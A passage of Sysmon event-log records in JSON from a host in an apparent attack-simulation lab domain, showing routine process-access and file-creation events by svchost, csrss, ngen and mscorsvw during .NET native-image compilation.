\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.148\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.148","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.195\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010D9390B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.195","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010D9390B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.195\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010D9390B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.195","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-0010D9390B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7091,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:19.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223F-5F25-0000-00105BED0B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:19.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-00105BED0B00}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7092,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:20.476\r\nProcessGuid: {41C8662E-223F-5F25-0000-00105BED0B00}\r\nProcessId: 2908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\Microsoft.CSharp.dll\r\nCreationUtcTime: 2020-08-01 08:05:20.476","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:20.476","ProcessGuid":"{41C8662E-223F-5F25-0000-00105BED0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b5c-0\\Microsoft.CSharp.dll","CreationUtcTime":"2020-08-01 08:05:20.476","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7093,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001076F10B00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001076F10B00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7094,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001076F10B00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001076F10B00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001076F10B00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001076F10B00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.585\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-001043F50B00}\r\nTargetProcessId: 3996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.585","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-001043F50B00}","TargetProcessId":"3996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dl